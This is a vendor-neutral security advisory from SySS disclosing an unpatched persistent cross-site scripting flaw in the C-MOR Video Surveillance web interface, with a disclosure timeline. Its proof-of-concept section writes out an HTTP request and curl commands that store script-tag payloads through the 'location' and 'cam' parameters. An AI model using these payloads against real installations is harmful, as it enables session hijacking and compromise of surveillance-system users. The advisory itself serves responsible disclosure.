Advisory ID: SYSS-2024-021 Product: C-MOR Video Surveillance Manufacturer: za-internet GmbH Affected Version(s): 5.2401, 6.00PL01 Tested Version(s): 5.2401, 6.00PL01 Vulnerability Type: Persistent Cross-Site Scripting (CWE-79) Risk Level: High Solution Status: Open Manufacturer Notification: 2024-04-05 Solution Date: - Public Disclosure: 2024-09-04 CVE Reference: CVE-2024-45177 Authors of Advisory: Chris Beiter, Frederik Beimgraben, and Matthias Deeg ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: The software product C-MOR is an IP video surveillance system. The manufacturer describes the product as follows: "With C-MOR video surveillance, it is possible to check your surveillance over network and the Internet. You can access the live view as well as previous recordings from any PC or mobile device. C-MOR is managed and controlled over the C-MOR web interface. IP settings, camera recording setup, user rights and so on are set over the web without the installation of any software on the client."[1] Due to improper input validation, the C-MOR web interface is vulnerable to persistent cross-site scripting attacks. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: By analyzing the C-MOR web interface, it was found that the camera configuration is vulnerable to a persistent cross-site scripting attack due to insufficient user input validation. This kind of attack enables an attacker to persistently store attack vectors in form of arbitrary code, for instance JavaScript code, in the web application database, which may be executed in the context of other users. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): An authenticated user can set the location of a camera. If valid JavaScript code is used as location value, this code will be persistently stored in the web application database. The injected JavaScript code is served to users and executed in their web browser's context when using different functionality of the C-MOR web interface, for instance camera settings via "show-movies.plm" or system administration via "systemadministration.plm". The following HTTPS POST request illustrates storing an attack vector via the parameter "location": POST /changelocation.pml HTTP/1.1 Host: <HOST> Authorization: Basic <CREDENTIALS> Content-Type: application/x-www-form-urlencoded Content-Length: 81 location=location%3Cscript%3Ealert%28%22SySS+XSS%21%22%29%3C%2Fscript%3E&cam=cam1 An excerpt of the resulting HTML source code containing the injected JavaScript code is shown below: (...)<input type=submit value="Aufzeichnung aktivieren" class="link_button2"> location<script>alert("SySS XSS!")</script><br>
(...) This PoC attack can be performed using the following curl command:curl -X POST -d 'location=location<script>alert("SySS XSS!")</script>&cam=cam1' --user "<USERNAME>:<PASSWORD>" --insecure --ciphers 'DEFAULT:!DH' https://<HOST>/changelocation.pml
In version 6.00PL01, persistent cross-site scripting vulnerabilties have not been fixed completely. For example, the following attack vector can successfully store attacker-controlled JavaScript code in the logs: curl -X POST \-d 'cam=</textarea><script>alert("Hello from XSS")</script><textarea>&days=1100' \
--user "<USERNAME>:<PASSWORD>" \ --insecure \ --ciphers 'DEFAULT:!DH' \ https://<HOST>/show-movies.pml ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: The described security vulnerability has not been fixed entirely in the newly released software version 6.00PL01. There is no fix for this security issue. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2024-04-05: Vulnerability reported to manufacturer 2024-04-05: Manufacturer acknowledges receipt of security advisories 2024-04-08: Exchange regarding security updates and disclosure timeline 2024-05-08: Further exchange concerning security updates and disclosure timeline; public release of all security advisories scheduled for release of C-MOR Video Surveillance version 6 2024-05-10: Release of C-MOR software version 5.30 with security updates for some reported security issues 2024-07-19: E-mail to manufacturer concerning release date of C-MOR Video Surveillance version 6; response with planned release date of 2024-08-01 2024-07-30: E-mail from manufacturer with further information concerning security fixes 2024-07-31: Release of C-MOR software version 6.00PL1 2024-09-04: Public release of security advisory ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for C-MOR Video Surveillance https://www.c-mor.com/ [2] SySS Security Advisory SYSS-2024-021 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-021.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Chris Beiter, Frederik Beimgraben. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en
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